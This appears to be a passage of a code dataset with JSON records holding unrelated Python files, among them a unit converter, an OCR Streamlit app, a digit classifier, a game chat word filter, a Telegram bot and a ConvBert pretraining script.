(\r\n end_unit in IMPERIAL_LENGTH_UNITS or end_unit in METRIC_LENGTH_UNITS\r\n ) and base_type == \"length\":\r\n type_flags[\"start_end_match\"] = True\r\n elif (\r\n start_unit in TIME_UNITS and end_unit in TIME_UNITS and base_type == \"time\"\r\n ):\r\n type_flags[\"start_end_match\"] = True\r\n elif (\r\n start_unit in TEMPERATURE_UNITS\r\n and end_unit in TEMPERATURE_UNITS\r\n and base_type == \"temperature\"\r\n ):\r\n type_flags[\"start_end_match\"] = True\r\n\r\n return type_flags\r\n\r\n\r\ndef _print_flag_errors(type_flags: dict) -> str:\r\n error = \"\"\r\n\r\n if not type_flags[\"good_base\"]:\r\n error += \"\\nInvalid `base_type` value.\"\r\n if not type_flags[\"good_quantity\"]:\r\n error += \"\\nInvalid `quantity` value.\"\r\n if not type_flags[\"good_start_unit\"]:\r\n error += \"\\nInvalid `start_unit`.\"\r\n if not type_flags[\"good_end_unit\"]:\r\n error += \"\\nInvalid `end_unit`.\"\r\n if not type_flags[\"start_end_match\"]:\r\n error += \"\\n`start_unit` and `end_unit` values don't match `base_type`.\"\r\n\r\n return error\r\n\r\n\r\ndef _print_result(\r\n start_quantity: Union[int, float],\r\n start_unit: str,\r\n end_unit: str,\r\n end_quantity: Union[int, float],\r\n) -> str:\r\n \"\"\"\r\n Function to create final output string for conversion.\r\n\r\n :param start_quantity: Integer or float starting quantity which needed conversion.\r\n :param start_unit: Initial unit type of integer or float starting quantity.\r\n :param end_unit: Ending unit type of integer or float quantity.\r\n :param end_quantity: Integer or float of converted starting quantity from start unit to end unit.\r\n :return: String of values concatenated in user friendly message.\r\n \"\"\"\r\n if end_quantity < 0.000001:\r\n output = \"Value smaller than decimal precision 6. 
Cannot output.\"\r\n else:\r\n output = f\"```{start_quantity} {start_unit} = {end_quantity} {end_unit}```\"\r\n return output\r\n\r\n\r\ndef _check_symbols(start_unit: str, end_unit: str) -> tuple:\r\n \"\"\"\r\n Checks if starting unit or ending unit are contained in the alias dictionary, SYMBOLS.\r\n :param start_unit: string indicating the starting unit type.\r\n :param end_unit: string indicating the ending unit type.\r\n :return: returns tuple of values post comparison/conversion with alias dictionary.\r\n \"\"\"\r\n if start_unit in SYMBOLS:\r\n start_unit = SYMBOLS[start_unit]\r\n if end_unit in SYMBOLS:\r\n end_unit = SYMBOLS[end_unit]\r\n\r\n return start_unit, end_unit\r\n\r\n\r\ndef _intermediate_helper(\r\n start_unit: str,\r\n end_unit: str,\r\n quantity: Union[int, float],\r\n imperial: dict,\r\n metric: dict,\r\n) -> Union[int, float]:\r\n\r\n \"\"\"\r\n Function turns any input quantity into an intermediate value based on dictionary constants. Function\r\n then takes the intermediate form and converts it to the target form.\r\n\r\n :param start_unit: Starting unit type of value input.\r\n :param end_unit: ending unit type of value input.\r\n :param quantity: Starting value to be converted.\r\n :param imperial: Imperial dictionary for related type conversion (length, volume, etc.).\r\n :param metric: Metric dictionary for related type conversion (length, volume, etc.).\r\n :return: Converted integer or float value of quantity from starting unit to ending unit.\r\n \"\"\"\r\n # Initialization\r\n final = 0\r\n intermediate_form = 0\r\n\r\n # Decisioning based on starting unit and ending unit.\r\n if start_unit in imperial:\r\n intermediate_form = quantity * imperial[start_unit]\r\n if end_unit in imperial:\r\n final = intermediate_form / imperial[end_unit]\r\n elif end_unit in metric:\r\n intermediate_form *= imperial[\"conversion\"]\r\n final = intermediate_form / metric[end_unit]\r\n\r\n elif start_unit in metric:\r\n intermediate_form = quantity * metric[start_unit]\r\n if end_unit in metric:\r\n final = intermediate_form / metric[end_unit]\r\n elif end_unit in imperial:\r\n intermediate_form *= metric[\"conversion\"]\r\n final = intermediate_form / imperial[end_unit]\r\n\r\n return final\r\n\r\n\r\ndef _convert_temp(\r\n start_unit: str, end_unit: str, quantity: Union[int, float]\r\n) -> Union[int, float]:\r\n\r\n \"\"\"\r\n Converts temperature between fahrenheit and celsius.\r\n :param start_unit: starting unit for conversion.\r\n :param end_unit: ending unit for quantity to be converted to.\r\n :param quantity: starting temperature to be converted.\r\n :return: quantity converted from starting unit to ending unit.\r\n \"\"\"\r\n temperature = 0\r\n if start_unit == \"fahrenheit\" and end_unit == \"celsius\":\r\n temperature = (quantity - 32) * (5 / 9) # (F - 32) * (5/9) = C\r\n elif start_unit == \"celsius\" and end_unit == \"fahrenheit\":\r\n temperature = (quantity * (9 / 5)) + 32 # (C * (9/5)) + 32 = F\r\n return temperature\r\n","repo_name":"sneks-sus/Novell","sub_path":"helpers/metric_conversion_helpers.py","file_name":"metric_conversion_helpers.py","file_ext":"py","file_size_in_byte":8091,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"32113538182","text":"from azure.core.credentials import AzureKeyCredential\nfrom azure.ai.formrecognizer import DocumentAnalysisClient\nfrom dotenv import load_dotenv\nimport io, os\nimport pandas as pd\nfrom PIL import Image\nimport streamlit as st\n\n\n# 
---Environment---\nload_dotenv(verbose=True, dotenv_path='.env')\nKEY = os.environ.get(\"KEY\") # Or write your API KEY directly\nENDPOINT = os.environ.get(\"ENDPOINT\")\n\nst.title(\"Handwritten table (image) → CSV\")\nst.write(\"Free tier: up to 500 pages/month. Created by Kudo\")\n\ndf_l = []\nPATH = \".\"\n\nuploaded_files = st.file_uploader(\"Upload files\", type=[\"jpg\", \"png\", \"tif\"], accept_multiple_files=True)\nif uploaded_files:\n for file in uploaded_files:\n img_path = os.path.join(PATH, file.name)\n with open(img_path, \"wb\") as f:\n f.write(file.read())\n img = Image.open(img_path)\n img = img.convert('RGB')\n\n img_byte_arr = io.BytesIO()\n img.save(img_byte_arr, format='JPEG')\n img_byte_arr = img_byte_arr.getvalue()\n \n document_analysis_client = DocumentAnalysisClient(endpoint=ENDPOINT, credential=AzureKeyCredential(KEY))\n poller = document_analysis_client.begin_analyze_document(\"prebuilt-layout\", img_byte_arr)\n response = poller.result()\n\n table_data = response.tables[0]\n df = pd.DataFrame(columns=list(range(table_data.column_count)), index=list(range(table_data.row_count)))\n for cell in table_data.cells:\n r, c, text = cell.row_index, cell.column_index, cell.content\n df.loc[r, c] = text\n # df = df[1:]\n\n df_l.append(df)\n os.remove(img_path)\n\nif df_l != []:\n df = pd.concat(df_l)\n\n st.write(\"Preview\")\n col1, col2 = st.columns(2)\n with col1:\n st.header(\"Uploaded file\")\n st.image(uploaded_files[0])\n with col2:\n st.header(\"Results\")\n st.dataframe(df.head(10))\n\n st.header(\"Download Here!\")\n # Build the UI for downloading the CSV file\n csv = df.to_csv(header=False, index=False).encode('shift-jis', 'replace')\n if st.download_button(label='Download CSV', data=csv, file_name=\"data.csv\", mime='text/csv'):\n st.write(\"Thank you!\")\n df_l = []","repo_name":"Takahiro910/text_ocr","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2889329758","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import optim\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data import Dataset\nimport sklearn\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import load_digits\nfrom sklearn.metrics import accuracy_score\nimport torchvision\n\n\nclass DigitDataset(Dataset):\n def __init__(self, data, targets):\n self.data = data\n self.targets = targets\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, item):\n return self.data[item], self.targets[item]\n\nclass LinearNetwork(nn.Module):\n \n def __init__(self, input_size, output_size):\n super().__init__()\n self.fc1 = nn.Linear(input_size, 128)\n self.fc2 = nn.Linear(128, 256)\n self.fc3 = nn.Linear(256, output_size)\n self.loss = F.mse_loss\n \n def forward(self, x):\n x = self.fc1(x)\n x = F.relu(x)\n x = self.fc2(x)\n x = F.relu(x)\n x = self.fc3(x)\n\n return x \n\ndata = load_digits()\nx = data[\"data\"]\ny = data[\"target\"]\nY = np.zeros((len(y), 10))\nindices = np.arange(len(y))\n\nY[indices, y] = 1\nbatch_size = 64\nX_train, X_test, Y_train, Y_test = train_test_split(x,Y,train_size=0.7)\ntrain_dataset = DigitDataset(data=X_train, targets=Y_train)\ntrain_dataloader = DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True)\ntest_dataset = DigitDataset(data=X_test, targets=Y_test)\ntest_dataloader = DataLoader(dataset=test_dataset, batch_size=batch_size, 
shuffle=True)\n\nlin_net = LinearNetwork(input_size = 64, output_size = 10)\noptimizer = optim.Adam(params=lin_net.parameters(),lr=0.001)\nepochs = 10\n\nfor epoch in range(epochs):\n if epoch % 1 == 0:\n lin_net.eval()\n correct = 0\n \n for x,y in test_dataloader:\n x = x.to(torch.float)\n y = y.to(torch.float)\n y_hat = lin_net(x)\n y_hat = torch.squeeze(y_hat,dim=1)\n choices = torch.argmax(y_hat,dim=1)\n indices = np.arange(len(x))\n y_hat = torch.zeros_like(y_hat)\n y_hat[indices,choices] = 1\n score = accuracy_score(y_hat,y)\n correct += score*len(x)\n \n print(correct/len(test_dataset))\n lin_net.train()\n\n for x, y in train_dataloader:\n x = x.to(torch.float)\n y = y.to(torch.float)\n #zero out the gradients\n \n optimizer.zero_grad()\n y_hat = lin_net(x)\n y_hat = torch.squeeze(y_hat,dim=1)\n loss = lin_net.loss(y_hat,y)\n \n\n loss.backward()\n optimizer.step()\n ","repo_name":"kerby2002/python-study-prgramming","sub_path":"digit_classifier.py","file_name":"digit_classifier.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41672237805","text":"##James Cathey 2020##\n##Gauss_USV##\n#Movement.py\n#Start of a file to do some movement and distance calculations for GAUSS\n\n\nimport math as Math\nfrom time import sleep\n\n#SmallTargetRadius = 15 #target radius sizes in meters\n#LargeTargetRadius = 100\n\n\n\ndef getGoalDistance(gLat,gLong,targetLat,targetLong):\n R = 6378.137 # Radius of earth in KM\n dLat = targetLat * Math.pi / 180 - gLat * Math.pi / 180\n dLon = targetLong * Math.pi / 180 - gLong * Math.pi / 180\n a = Math.sin(dLat/2) * Math.sin(dLat/2) + Math.cos(gLat * Math.pi / 180) * Math.cos(targetLat * Math.pi / 180) * Math.sin(dLon/2) * Math.sin(dLon/2)\n c = 2 * Math.atan2(Math.sqrt(a), Math.sqrt(1-a))\n d = R * c\n distance = d*1000 #distance from target to Gauss in meters\n return distance\n\n\ndef inRadius(dist, targetRadius):\n if dist < targetRadius:\n return True\n else :\n return False\n\ndef getGoalHeading(gaussLat, gaussLong, targetLat, targetLong):\n # inputs are in degrees; convert to radians before the trig below\n gLat = Math.radians(gaussLat)\n gLong = Math.radians(gaussLong)\n tLat = Math.radians(targetLat)\n tLong = Math.radians(targetLong)\n X = Math.cos(tLat) * Math.sin(tLong-gLong)\n Y = Math.cos(gLat)*Math.sin(tLat) - Math.sin(gLat) * Math.cos(tLat)*Math.cos(tLong-gLong)\n radHeading = Math.atan2(X,Y)\n goalDegrees = radHeading*180/Math.pi\n return goalDegrees\n\n##Testing functions\n\n#dist = getGoalDistance(47.262114, -122.438085, 47.262118, -122.437940)\n#print('Distance from goal = ', dist , 'Meters');\n\n#done = inRadius(dist, 30);\n#print('Gauss is in the radius', done)\n\n","repo_name":"jamesssf/GAUSS-USV","sub_path":"DistancetoGoal.py","file_name":"DistancetoGoal.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5201680490","text":"import keyboard\r\nfrom pynput import mouse\r\n\r\nfile_path = 'ban_words.txt' \r\n\r\nwith open(file_path, 'r') as file:\r\n content = file.read()\r\n flaggedWords = content.split()\r\n\r\nflagged_words_lower = [word.lower() for word in flaggedWords]\r\n\r\nstring = ''\r\nstartTyping = False\r\n\r\ndef on_key_press(event):\r\n global flaggedWords\r\n global string\r\n global startTyping\r\n \r\n if event.name == 'space':\r\n if startTyping:\r\n\r\n words_to_check = string.lower().split()\r\n\r\n flagged = False\r\n for word in words_to_check:\r\n if word in flagged_words_lower:\r\n print(f\"Word {word} is flagged\")\r\n\r\n words_to_check.remove(word)\r\n string = ' '.join(words_to_check)\r\n string += ' '\r\n\r\n for i in 
range(len(word)+1):\r\n keyboard.send('backspace')\r\n\r\n flagged = True\r\n if flagged == False:\r\n string += ' '\r\n elif event.name == 'enter':\r\n if startTyping:\r\n print(f\"Key Pressed: {string} with the length of {len(string)}\")\r\n startTyping = False\r\n string = ''\r\n else:\r\n startTyping = True\r\n string = ''\r\n elif event.name == 'esc':\r\n startTyping = False\r\n string = ''\r\n else:\r\n if startTyping:\r\n if len(event.name) == 1:\r\n string += event.name\r\n\r\n words_to_check = string.lower().split()\r\n\r\n for word in words_to_check:\r\n if word in flagged_words_lower:\r\n\r\n words_to_check.remove(word)\r\n\r\n string = ' '.join(words_to_check)\r\n string += ' '\r\n\r\n for i in range(len(word)):\r\n keyboard.send('backspace')\r\n\r\n if len(string) == 1:\r\n string = string[:-1]\r\n\r\n\r\n elif event.name == 'backspace':\r\n if len(string) > 0:\r\n string = string[:-1]\r\n\r\ndef on_mouse_click(x, y, button, pressed):\r\n global startTyping\r\n global string\r\n\r\n\r\n if button == button.left and not pressed and startTyping == True:\r\n print(f\"X pos is {x}, Y pos is {y}\")\r\n #Positions of the chatBox\r\n if (x < 1042 or x > 1478) or (y < 929 or y > 968):\r\n keyboard.send('esc')\r\n startTyping = False\r\n string = ''\r\n print(f\"You clicked outside the chat box, so closing it\")\r\n\r\n\r\n\r\nimport threading\r\nimport time\r\nimport psutil\r\nimport win32gui\r\n\r\ndef is_process_running(process_name):\r\n for proc in psutil.process_iter(['name']):\r\n if proc.info['name'] == process_name:\r\n return True\r\n return False\r\n\r\ndef is_app_selected(window_title):\r\n hwnd = win32gui.GetForegroundWindow()\r\n selected_window_title = win32gui.GetWindowText(hwnd)\r\n return selected_window_title == window_title\r\n\r\n\r\n\r\n# Everything above is the chat filter logic and the checks that the functions work\r\n\r\n###################################################################\r\n\r\n# From here on: program startup and threading\r\n\r\ndef task(exit_flag):\r\n global startTyping\r\n global string\r\n\r\n\r\n stop_thread2 = threading.Event() # Event used to signal thread2 to stop\r\n\r\n def another_task():\r\n global startTyping\r\n global string\r\n\r\n while not stop_thread2.is_set():\r\n\r\n\r\n startTyping = False\r\n string = ''\r\n\r\n keyboard.on_press(on_key_press)\r\n\r\n\r\n mouse_listener = mouse.Listener(on_click=on_mouse_click)\r\n\r\n mouse_listener.start()\r\n\r\n while not stop_thread2.is_set():\r\n time.sleep(0.1) # Adjust the sleep duration as needed\r\n\r\n keyboard.unhook_all()\r\n\r\n mouse_listener.stop()\r\n\r\n\r\n\r\n thread2 = None\r\n\r\n\r\n while not exit_flag.is_set(): # TODO: button for changing this variable\r\n # Checks if you're in a game\r\n process_name = \"League of Legends.exe\"\r\n if is_process_running(process_name):\r\n app_title = \"League of Legends (TM) Client\" \r\n if is_app_selected(app_title):\r\n if thread2 is None or not thread2.is_alive():\r\n thread2 = threading.Thread(target=another_task)\r\n stop_thread2.clear()\r\n thread2.start()\r\n else:\r\n if thread2 is not None and thread2.is_alive():\r\n stop_thread2.set() # Signal thread2 to stop\r\n thread2.join()\r\n thread2 = None\r\n\r\n time.sleep(2.5) \r\n\r\n # Check for an exit condition\r\n if stop_thread2.is_set():\r\n if thread2 is not None and thread2.is_alive():\r\n stop_thread2.set() # Signal thread2 to stop\r\n thread2.join()\r\n\r\n\r\n\r\n###################################################################\r\n\r\n# Create the exit flag as a shared variable\r\nexit_flag = threading.Event()\r\n\r\n# Create and start the first thread\r\nthread = threading.Thread(target=task, args=(exit_flag,))\r\nthread.start()\r\n\r\n\r\n# this will be hooked up to a button click\r\n# Wait for the termination signal (e.g., Ctrl+C)\r\ntry:\r\n while True:\r\n time.sleep(1)\r\nexcept KeyboardInterrupt:\r\n 
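# Ctrl+C received: report it, then signal the worker thread to stop and join it below.\r\n 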
print(\"KeyboardInterrupt: Stopping the program.\")\n exit_flag.set()\n # stop_thread2.set()\n\nthread.join()\n\nprint(\"Program ended.\")\n\n","repo_name":"FilipJovanovic10020rn/League-of-Legends-Chat-Filter","sub_path":"FuncionalityForProgramFinished.py","file_name":"FuncionalityForProgramFinished.py","file_ext":"py","file_size_in_byte":5303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25537179420","text":"\"\"\"\n@Time : 2020-11-26 17:03:29\n@File : run_pretraining.py\n@Author : Abtion\n@Email : abtion{at}outlook.com\n\"\"\"\n\nfrom sklearn.model_selection import train_test_split\nimport os\n\nfrom tqdm import tqdm\n\nfrom simpletransformers.language_modeling import LanguageModelingModel\nimport logging\n\n\ndef proc_data():\n import json\n all_text = []\n data_path = '/ml/nlp/data'\n # for fn in os.listdir(data_path):\n # if os.path.isdir(os.path.join(data_path, fn)):\n # for txt_name in tqdm(os.listdir(os.path.join(data_path, fn))):\n # txt_path = os.path.join(data_path, fn, txt_name)\n # if txt_path.endswith('.txt'):\n # with open(txt_path, 'r', encoding='utf8') as f:\n # for line in f:\n # line = line.strip()\n # if len(line) > 1:\n # all_text.append(line)\n data_path = '/ml/nlp/data/wiki'\n for txt_name in tqdm(os.listdir(data_path)):\n txt_path = os.path.join(data_path, txt_name)\n if txt_path.endswith('.txt'):\n with open(txt_path, 'r', encoding='utf8') as f:\n for line in f:\n line = line.strip()\n if len(line) > 1:\n all_text.append(line)\n\n with open('data/data.json', 'r', encoding='utf8') as f:\n data = json.load(f)\n for d in data:\n all_text.append(d['Title'])\n all_text.append(d['Content'])\n\n train, test = train_test_split(all_text, test_size=0.1)\n\n with open(\"data/train.txt\", \"w\") as f:\n for line in train:\n f.write(line + \"\\n\")\n\n with open(\"data/test.txt\", \"w\") as f:\n for line in test:\n f.write(line + \"\\n\")\n\n\ndef main():\n logging.basicConfig(level=logging.INFO)\n transformers_logger = logging.getLogger(\"transformers\")\n transformers_logger.setLevel(logging.WARNING)\n\n train_args = {\n \"reprocess_input_data\": False,\n \"overwrite_output_dir\": True,\n \"num_train_epochs\": 50,\n \"save_eval_checkpoints\": True,\n \"save_model_every_epoch\": False,\n \"learning_rate\": 1e-3,\n \"warmup_steps\": 10000,\n \"train_batch_size\": 64,\n \"eval_batch_size\": 128,\n \"gradient_accumulation_steps\": 2,\n \"block_size\": 128,\n \"max_seq_length\": 128,\n \"dataset_type\": \"simple\",\n \"wandb_project\": \"Esperanto - ConvBert\",\n \"wandb_kwargs\": {\"name\": \"ConvBert-SMALL\"},\n \"logging_steps\": 100,\n \"evaluate_during_training\": True,\n \"evaluate_during_training_steps\": 3000,\n \"evaluate_during_training_verbose\": True,\n \"use_cached_eval_features\": True,\n \"sliding_window\": False,\n \"tokenizer_name\": \"bert-base-chinese\",\n \"use_multiprocessing\": True,\n \"process_count\": 8,\n \"vocab_size\": 21128,\n \"generator_config\": {\n \"attention_probs_dropout_prob\": 0.1,\n \"directionality\": \"bidi\",\n \"embedding_size\": 128,\n \"hidden_act\": \"gelu\",\n \"hidden_dropout_prob\": 0.1,\n \"hidden_size\": 64,\n \"initializer_range\": 0.02,\n \"intermediate_size\": 256,\n \"layer_norm_eps\": 1e-12,\n \"max_position_embeddings\": 512,\n \"model_type\": \"convbert\",\n \"num_attention_heads\": 1,\n \"num_hidden_layers\": 12,\n \"pad_token_id\": 0,\n \"summary_activation\": \"gelu\",\n \"summary_last_dropout\": 0.1,\n \"summary_type\": \"first\",\n \"summary_use_proj\": 
True,\n \"type_vocab_size\": 2,\n \"vocab_size\": 21128\n },\n \"discriminator_config\": {\n \"attention_probs_dropout_prob\": 0.1,\n \"embedding_size\": 128,\n \"hidden_act\": \"gelu\",\n \"hidden_dropout_prob\": 0.1,\n \"hidden_size\": 256,\n \"initializer_range\": 0.02,\n \"intermediate_size\": 1024,\n \"layer_norm_eps\": 1e-12,\n \"max_position_embeddings\": 512,\n \"model_type\": \"convbert\",\n \"num_attention_heads\": 4,\n \"num_hidden_layers\": 12,\n \"output_past\": True,\n \"pad_token_id\": 0,\n \"summary_activation\": \"gelu\",\n \"summary_last_dropout\": 0.1,\n \"summary_type\": \"first\",\n \"summary_use_proj\": True,\n \"type_vocab_size\": 2,\n \"vocab_size\": 21128\n },\n }\n\n train_file = \"data/train.txt\"\n test_file = \"data/test.txt\"\n\n model = LanguageModelingModel(\n \"convbert\",\n None,\n args=train_args,\n train_files=train_file,\n cuda_device=1,\n )\n\n model.train_model(\n train_file, eval_file=test_file,\n )\n\n model.eval_model(test_file)\n\n\ndef save_best_model():\n model = LanguageModelingModel(\n 'convbert',\n 'outputs/best_model',\n args={\"output_dir\": \"discriminator_trained\"}\n )\n model.save_discriminator()\n\n\nif __name__ == '__main__':\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\n # proc_data()\n main()\n # save_best_model()\n","repo_name":"gitabtion/ConvBert-PyTorch","sub_path":"run_language_modeling.py","file_name":"run_language_modeling.py","file_ext":"py","file_size_in_byte":5148,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"31"} +{"seq_id":"35738062921","text":"\nimport telepot\nimport time\nimport urllib3\nimport Bot\nfrom config import *\n\nproxy_url = \"http://proxy.server:3128\"\n# telepot.api._pools = {\n# 'default': urllib3.ProxyManager(proxy_url=proxy_url, num_pools=3, maxsize=10, retries=False, timeout=30),\n# }\ntelepot.api._onetime_pool_spec = (urllib3.ProxyManager, dict(proxy_url=proxy_url, num_pools=1, maxsize=1, retries=False, timeout=30))\n\nbot = telepot.Bot(BOT_TOKEN)\nprevText = {}\nprevReply = {}\npeople = []\n\n\ndef handle(msg):\n content_type, chat_type, chat_id = telepot.glance(msg)\n print(content_type, chat_type, chat_id)\n\n if content_type == 'text':\n if chat_id not in people:\n bot.sendMessage(chat_id, \"Hello! You seem to be a new face, allow me to introduce myself. I am anokhaBot I'm an \\\n artificial agent that can tell you anything about Anokha. I'm still learning a lot about \\\n anokha so it would be very helpful if you type /wrong whenever I go wrong somewhere and I promise to get better next time.\")\n people.append(chat_id)\n if msg[\"text\"] == \"/wrong\":\n with open(\"errors.txt\", \"a\") as file:\n writeData = \"cid-\" + str(chat_id) + \"-txt-\" + str(prevText[chat_id]) + \"-rep-\" + str(prevReply[chat_id]) + \"\\n\"\n file.write(writeData)\n return\n reply = Bot.response(msg[\"text\"])\n prevText[chat_id] = msg[\"text\"]\n prevReply[chat_id] = reply\n bot.sendMessage(chat_id, reply)\n print(prevReply, prevText)\n\nbot.message_loop(handle)\n\nprint('Listening ...')\nwhile 1:\n time.sleep(10)\n","repo_name":"Shanthosh1/AnokhaBot","sub_path":"Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13663183262","text":"import win32com.client as wincl\r\nimport speech_recognition as sr\r\nimport webbrowser as wb\r\n\r\nspeak = wincl.Dispatch(\"SAPI.SpVoice\")\r\n\r\nr = sr.Recognizer()\r\nwith sr. 
Microphone() as source:\r\n speak.Speak(\"Hi my amazing QUEEN, how can I help you today?\")\r\n print(\"Listening...\")\r\n audio = r.listen(source)\r\n print (\"Thinking...\")\r\n\r\ntry:\r\n words = r.recognize_google(audio)\r\n speak.Speak(\"Ok QUEEN, let's look for \" + r.recognize_google(audio))\r\n wb.open (\"https://www.youtube.com/results?search_query=\" + words)\r\n\r\nexcept sr.UnknownValueError:\r\n print(\"Google Speech Recognition could not understand audio\")\r\nexcept sr.RequestError as e:\r\n print (\"Could not connect to internet\")\r\n","repo_name":"AlexandraWin/Pyautogui_AW","sub_path":"Siri_AW.py","file_name":"Siri_AW.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73932168088","text":"import numpy as np\nimport argmin\n\n\nclass Problem:\n \"\"\"blah\"\"\"\n\n def __init__(self):\n \"\"\"Constructor (duh)\"\"\"\n self.a = 1.0\n self.b = 100.0\n\n def apply(self, param):\n \"\"\"apply\"\"\"\n out = (self.a - param[0]) ** 2 + self.b * (param[1] - param[0] ** 2) ** 2\n return out\n\n def gradient(self, param):\n x = param[0]\n y = param[1]\n out = np.array(\n [\n -2.0 * self.a + 4.0 * self.b * x ** 3 - 4.0 * self.b * x * y + 2.0 * x,\n 2.0 * self.b * (y - x ** 2),\n ]\n )\n return out\n\n\nprob = Problem()\n\nsolver = argmin.lbfgs(m=10)\nprint(solver)\n\nexecutor = argmin.executor(prob, solver, np.array([1.2, 1.2]))\nprint(executor)\nexecutor.run()\n","repo_name":"argmin-rs/pyargmin","sub_path":"examples/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"33703772028","text":"import argparse\r\n\r\nimport torch\r\nfrom torch.utils.data import DataLoader\r\n\r\nimport dataset as dataset_module\r\nfrom diffusion.gaussian_diffusion import GaussianDiffusion\r\nimport model.representation_learning.encoder as encoder_module\r\nfrom utils.utils import load_yaml, move_to_cuda\r\n\r\nfrom sampler.base_sampler import BaseSampler\r\n\r\nclass Sampler(BaseSampler):\r\n def __init__(self, args):\r\n super().__init__(args)\r\n print('rank{}: sampler initialized.'.format(self.global_rank))\r\n\r\n def _build_dataloader(self):\r\n dataset_config = self.config[\"dataset_config\"]\r\n self.dataset_name = dataset_config[\"dataset_name\"]\r\n dataset = getattr(dataset_module, dataset_config[\"dataset_name\"], None)(dataset_config)\r\n\r\n self.dataloader = DataLoader(\r\n dataset,\r\n collate_fn=dataset.collate_fn,\r\n batch_size=self.config[\"batch_size\"],\r\n num_workers=self.config[\"num_workers\"],\r\n shuffle=False,\r\n drop_last=False,\r\n )\r\n\r\n def _build_model(self):\r\n config_path = self.config[\"config_path\"]\r\n checkpoint_path = self.config[\"checkpoint_path\"]\r\n model_config = load_yaml(config_path)\r\n self.gaussian_diffusion = GaussianDiffusion(model_config[\"diffusion_config\"], device=self.device)\r\n self.encoder = getattr(encoder_module, model_config[\"encoder_config\"][\"model\"], None)(**model_config[\"encoder_config\"])\r\n checkpoint = torch.load(checkpoint_path, map_location=torch.device('cpu'))\r\n self.encoder.load_state_dict(checkpoint['ema_encoder'])\r\n self.encoder = self.encoder.cuda()\r\n self.encoder.eval()\r\n\r\n def start(self):\r\n z_list = []\r\n\r\n with torch.inference_mode():\r\n for i, batch in enumerate(self.dataloader):\r\n print(i)\r\n x_0 = move_to_cuda(batch[\"x_0\"])\r\n z = self.encoder(x_0)\r\n 
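# keep only a CPU copy of each latent so GPU memory stays bounded over the full dataset\r\n 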
z_list.append(z.cpu())\r\n\r\n        latent = torch.cat(z_list,dim=0)\r\n\r\n        torch.save({\"mean\": latent.mean(0), \"std\":latent.std(0)}, \"./\"+ self.dataset_name.lower() + \".pt\")\r\n\r\nif __name__ == '__main__':\r\n    parser = argparse.ArgumentParser()\r\n    args = parser.parse_args()\r\n\r\n    args.config = {\r\n        \"config_path\": \"./trained-models/autoencoder/ffhq128/config.yml\",\r\n        \"checkpoint_path\": \"./trained-models/autoencoder/ffhq128/checkpoint.pt\",\r\n\r\n        \"dataset_config\": {\r\n            \"dataset_name\": \"CELEBAHQ\",\r\n            \"data_path\": \"./data/celebahq\",\r\n            \"image_channel\": 3,\r\n            \"image_size\": 128,\r\n            \"augmentation\": False,\r\n        },\r\n\r\n        \"batch_size\": 100,\r\n        \"num_workers\": 2,\r\n    }\r\n\r\n    runner = Sampler(args)\r\n    runner.start()\r\n","repo_name":"ckczzj/PDAE","sub_path":"sampler/infer_latents.py","file_name":"infer_latents.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":200,"dataset":"github-code","pt":"31"} +{"seq_id":"1711177010","text":"import math\nfrom collections import Counter\nlst = [2,2,3,7,5,7,7,7,4,7,2,7,4,5,6,7,7,8,6,7,7,8,10,12,29,30,19,10,7,7,7,7,7,7,7,7,7]\n\nc = Counter(lst)\nn = len(lst)\n\ndef findMajorityElement():\n    for key, val in c.items():\n        if val > math.floor(n/2):  # a majority element must occur strictly more than n/2 times\n            return key\n","repo_name":"YearOfProgramming/2017Challenges","sub_path":"challenge_3/python/hkl0902/Challenge_3.py","file_name":"Challenge_3.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":205,"dataset":"github-code","pt":"31"} +{"seq_id":"40280735778","text":"import helpers\n\n# apply an uber coupon to the most recent trip ($15 off previous ride)\n\n#taken as input from app\nuser = 8\n\n\n# find all credit cards of user\nquery = helpers.cur.mogrify(\n'''\nSELECT credit_cardID, userID\nFROM creditcards\nWHERE userID = %s;\n''', (str(user),)\n)\n\nhelpers.cur.execute(query)\n\nuser_credit_cards = helpers.cur.fetchall()\n\n\ncard_ids = []\nfor credit_card in user_credit_cards:\n\tcard_ids.append(credit_card[0])\n\n# find most recent trip attached to list of user's credit cards\nhelpers.cur.execute(\n'''\nSELECT tripID, credit_cardID, fare\nFROM trips;\n''')\n\n# assuming the most recent trip has the greatest tripID\nrows = helpers.cur.fetchall()\nfor row in rows:\n\tif row[1] in card_ids:\n\t\ttrip_id = row[0]\n\t\tfare = row[2]\n\n\n# printing original fare to compare with discounted fare later\nprint(\"the tripID is: \" + str(trip_id) + \" and the original fare is: \" + str(fare))\n\n\n# apply coupon\nif fare <= 15:\n\tdiscounted_fare = 0\nelse:\n\tdiscounted_fare = fare - 15\n\n# round to nearest cent\ndiscounted_fare = round(discounted_fare, 2)\n\n# updating db with new 